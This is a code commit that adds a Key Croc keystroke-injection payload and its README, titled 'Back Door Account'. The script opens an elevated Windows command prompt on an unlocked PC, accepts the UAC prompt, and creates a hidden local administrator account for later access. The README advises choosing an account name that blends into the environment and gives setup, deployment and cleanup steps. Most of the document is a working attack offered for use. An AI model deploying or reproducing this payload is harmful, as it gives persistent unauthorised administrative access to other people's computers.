Basic script for back door account
saintcrossbow
parent
70b617078e
commit
9ad1bb5d1a
|
|
@ -0,0 +1,30 @@
|
|||
# Back Door Account
|
||||
### Add an account to an unlocked PC before the keystrokes are caught
|
||||
---
|
||||
Simple script that adds an administrative user for later access. Only works, of course, if the PC is unlocked. However this is a nice complement to the SkeletonKey payload: just add the new user when you unlock the PC.
|
||||
|
||||
The payload was tested on Windows 10.
|
||||
|
||||
*Setup*
|
||||
1. Connect the Key Croc and place into arming mode
|
||||
2. Place `addadmin.txt` in the payloads directory
|
||||
3. Change the `BACKDOOR_USER` variable to something that will blend into the environment
|
||||
4. Change the `BACKDOOR_PASS` variable to a reasonably strong password
|
||||
5. Optionally change the MATCH string to a unique passphrase of your choice
|
||||
6. Eject the Key Croc safely
|
||||
|
||||
The Key Croc is ready for deployment.
|
||||
|
||||
*Deploy*
|
||||
1. Connect the Key Croc to target in attack configuration
|
||||
2. If you are lucky enough to find yourself at an unlocked screen, type `__addadmin`
|
||||
3. With some luck, your user name and password will be added
|
||||
|
||||
*Cleanup*
|
||||
1. Remove the user from the admin group: `net localgroup administrators officeadmin /delete`
|
||||
2. Remove the user from the system: `net users officeadmin /delete`
|
||||
|
||||
*What’s up with the name SaintCrossbow?*
|
||||
Most of it is because it wasn’t taken. Other than that, I’m a big fan of the literary Saint by Leslie Charteris: a vigilante type who very kindly takes on problem people, serves his own justice, and has a great deal of fun doing it. Also, I just can’t help but think that crossbows are cool.
|
||||
|
||||
|
||||
|
|
@ -0,0 +1,26 @@
|
|||
# Title: Add a backdoor user to access PC later (assuming PC is unlocked)
|
||||
# Author: Saint Crossbow
|
||||
# Version: 1.0
|
||||
|
||||
MATCH __addadmin
|
||||
LED ATTACK
|
||||
|
||||
BACKDOOR_USER="officeadmin"
|
||||
BACKDOOR_PASS="changethis"
|
||||
|
||||
sleep 2
|
||||
Q GUI r
|
||||
Q STRING "cmd"
|
||||
Q CTRL-SHIFT ENTER
|
||||
sleep 2
|
||||
Q ALT Y
|
||||
sleep 1
|
||||
Q STRING "net user /add $BACKDOOR_USER $BACKDOOR_PASS"
|
||||
Q ENTER
|
||||
Q STRING "net localgroup administrators $BACKDOOR_USER /add"
|
||||
Q ENTER
|
||||
Q STRING "exit"
|
||||
Q ENTER
|
||||
LED FINISH
|
||||
sleep 1
|
||||
LED OFF
|
||||
Loading…
Reference in New Issue